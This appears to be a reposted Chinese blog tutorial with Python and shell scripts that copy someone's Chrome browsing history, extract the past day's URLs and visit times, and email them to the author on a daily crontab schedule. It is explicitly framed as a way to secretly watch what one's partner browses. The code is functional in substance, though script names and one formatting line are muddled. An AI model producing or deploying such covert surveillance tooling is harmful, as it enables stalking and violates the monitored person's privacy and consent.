python监控网页变化教程_Python实时监控网站浏览记录实现过程详解

python监控网页变化教程_Python实时监控网站浏览记录实现过程详解需求:(1)获取你对象chrome前一天的浏览记录中的所有网址(url)和访问时间,并存在一个txt文件中(2)将这个txt文件发送给指定的邮箱地址(你的邮箱)(3)建立例行任务,每天定时自动完成这些操作,你就可以通过邮件查看你对象每天看啥了准备macOSSierraPython3.6Chrome发送邮件的qq邮箱地址qq邮箱授权码SMTP服务器地址:smtp.qq.com接受邮件的邮箱地…

大家好,又见面了,我是你们的朋友全栈君。

需求:

(1) 获取你对象chrome前一天的浏览记录中的所有网址(url)和访问时间,并存在一个txt文件中

(2)将这个txt文件发送给指定的邮箱地址(你的邮箱)

(3)建立例行任务,每天定时自动完成这些操作,你就可以通过邮件查看你对象每天看啥了

准备

macOS Sierra

Python3.6

Chrome

发送邮件的qq邮箱地址

qq邮箱授权码

SMTP服务器地址 : smtp.qq.com

接受邮件的邮箱地址

执行:

(1) 首先我们用DB Browser for SQLite来看下History中的urls表的数据组成

从表中可以看出,我们要的网址和访问时间就在urls.url和urls.last_visit_time中

python监控网页变化教程_Python实时监控网站浏览记录实现过程详解

(2) get_history.py:

# -*- coding: utf-8 -*-

from email import encoders

from email.header import Header

from email.mime.text import MIMEText

from email.mime.multipart import MIMEMultipart

from email.mime.base import MIMEBase

from email.utils import parseaddr, formataddr

import smtplib

import argparse

# 1.文件执行的需要的参数(result.txt)

parser = argparse.ArgumentParser()

parser.add_argument(‘affix_file’,help=’the path of the affix’)

args = parser.parse_args()

# 2.格式化一个邮件地址和邮件信息

def _format_addr(s):

name, addr = parseaddr(s)

return formataddr((Header(name, ‘utf-8’).encode(), addr))

#连接服务器(这里大家好改成自己的!)

from_addr = “771568102@qq.com” #发件人邮箱

password = “xxxxxxxx” #发件人邮箱授权码

to_addr = “2160802033@cnu.edu.cn” #收件人邮箱

smtp_server = “smtp.qq.com” #SMTP服务器地址

#邮件发件人名字、收件人名字、主题

msg = MIMEMultipart()

msg[‘From’] = _format_addr(‘风一样的女子 ‘ % from_addr)

msg[‘To’] = _format_addr(‘风一样的男子 ‘ % to_addr)

msg[‘Subject’] = Header(‘chrome历史记录每日更新’, ‘utf-8’).encode()

# 邮件正文是MIMEText:

msg.attach(MIMEText(‘窥探隐私是犯法的啊!’, ‘plain’, ‘utf-8’))

# 添加附件就是加上一个MIMEBase,从本地读取一个txt文件:

with open(args.affix_file, ‘r’) as f:

# 设置附件的MIME和文件名,这里是py类型:

mime = MIMEBase(‘result’, ‘txt’, filename=’result.txt’)

# 加上必要的头信息:

mime.add_header(‘Content-Disposition’, ‘attachment’, filename=’result.txt’)

mime.add_header(‘Content-ID’, ‘<0>’)

mime.add_header(‘X-Attachment-Id’, ‘0’)

# 把附件的内容读进来:

mime.set_payload(f.read())

# 用Base64编码:

encoders.encode_base64(mime)

# 添加到MIMEMultipart:

msg.attach(mime)

#3.通过SMTP发送出去

server = smtplib.SMTP(smtp_server, 25)

server.set_debuglevel(1)

server.login(from_addr, password)

server.sendmail(from_addr, [to_addr], msg.as_string())

server.quit()

通过这个脚本,我们可以把url和访问时间提取出来,并且存储在

result.txt中,下图就是我得到的部分结果

python监控网页变化教程_Python实时监控网站浏览记录实现过程详解

(3) send_email.py:

# -*- coding: utf-8 -*-

import sqlite3

#大家要改成自己的路径

history_db = ‘/Users/Marcel/Desktop/tmp/code/chrome_history/History’

# 1.连接history_db

c = sqlite3.connect(history_db)

cursor = c.cursor()

# 2.选取我们想要的网址和访问时间

try:

select_statement = “SELECT url,datetime(last_visit_time/1000000-11644473600,’unixepoch’,’localtime’) AS tm FROM urls WHERE julianday(‘now’) – julianday(tm) < 1 ORDER BY tm;”

cursor.execute(select_statement)

except sqlite3.OperationalError:

print(“[!] The database is locked! Please exit Chrome and run the script again.”)

quit()

# 3.将网址和访问时间存入result.txt文件

results = cursor.fetchall()

with open(‘/Users/Marcel/Desktop/tmp/code/chrome_history/result.txt’,’w’) as f:#改成自己的路径

for i in range(len(results)):

f.write(results[i][1]+’\n’)

f.write(results[i][0]+’\n’)

通过这个脚本,我们可以把result.txt作为附件,发送给指定邮箱地

址,下图是我得到的部分结果

python监控网页变化教程_Python实时监控网站浏览记录实现过程详解

(4) ./start.sh :其实,前面几个脚本,已经完成了我们的任务,但是每次都执行这么多脚

本,太麻烦了,我们可以把这些脚本的执行语句整理成一个shell脚本。

cp /Users/Marcel/Library/Application\ Support/Google/Chrome/Default/History /Users/Marcel/Desktop/tmp/code/chrome_history/

python /Users/Marcel/Desktop/tmp/code/chrome_history/get_history.py

python /Users/Marcel/Desktop/tmp/code/chrome_history/send_mail.py /Users/Marcel/Desktop/tmp/code/chrome_history/result.txt

这样,我们在终端执行./start.sh,系统就会帮我们把这三条语句依次执行了

注意:由于crontab命令需要绝对路径,所以这里的路径都是用绝对路径

(5) crontab :如果使用了这个命令,在电脑开机并且联网的情况,系统会自动执行,然后把结果发到你的邮箱

使用方法:在终端下输入crontab -e,使用vim输入下面一行代码就可以了

20 14 * * * /Users/Marcel/Desktop/tmp/code/chrome_history/start.sh

说明:前面两个数字,就是你每天执行这个脚本的时间,我这里设置的是14:20。

重要的事再说一遍,一定要写绝对路径!!

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持python博客。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/160597.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • python – 关于pycharm选择运行环境「建议收藏」

    python – 关于pycharm选择运行环境「建议收藏」一直用pycharm写代码一直用anaconda管理python环境但是今天我居然发现我不会更改pycharm当前的运行环境到我新建的anacondaenvironment中!配置:系统:win10;GPU:NVIDIAGeForceGTX1050Ti管理平台:anaconda3IDE:Pycharm问题我的anaconda里面有三个环境,第一个是自…

    2022年8月26日
    5
  • tcp/ip协议包含哪几层_ip协议提供的是一种什么服务

    tcp/ip协议包含哪几层_ip协议提供的是一种什么服务在OSI模型中ARP协议属于链路层;而在TCP/IP模型中,ARP协议属于网络层。1)ARP分层的位置是TCP/IP的网络层2)ARP报文是由以太网帧进行封装传输的。没有封装进IP包。3)实际上

    2022年8月5日
    4
  • spss交叉表分析 + SPSS卡方检验

    spss交叉表分析 + SPSS卡方检验spss中交叉分析主要用来检验两个变量之间是否存在关系,或者说是否独立,其零假设为两个变量之间没有关系。在实际工作中,经常用交叉表来分析比例是否相等。例如分析不同的性别对不同的报纸的选择有什么不同。spss交叉表分析方法与步骤: 1、在spss中打开数据,然后依次打开:analyze–descriptive–crosstabs,打开交叉表对话框 2、将性别放到行列表,将

    2022年5月16日
    205
  • SpringBoot——SpringBoot整合RabbitMQ(下)

    SpringBoot——SpringBoot整合RabbitMQ(下)SpringBoot——SpringBoot整合RabbitMQ(下)

    2022年4月23日
    39
  • 小波变换分解与重构_小波变换和小波分解

    小波变换分解与重构_小波变换和小波分解转:天津大学小波分析宗婧1015202078原理可参考:https://wenku.baidu.com/view/73439a6d5901020207409cd5.html1、单层小波分解%1.单层小波分解%读入信号loadleleccum;s=leleccum(1:4000);%通过db4小波基进行离散小波变换[cA1,cD1]=dwt(s,’d…

    2022年10月21日
    2
  • 教你写Makefile(很全,含有工作经验的)

    教你写Makefile(很全,含有工作经验的)原文转载文Makefile值得一提的是,在Makefile中的命令,必须要以[Tab]键开始。    什么是makefile?或许很多Winodws的程序员都不知道这个东西,因为那些Windows的IDE都为你做了这个工作,但我觉得要作一个好的和professional的程序员,makefile还是要懂。这就好像现在有这么多的HTML的编辑器,但如果你想成为一个专业人士,你还是…

    2022年5月8日
    30

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号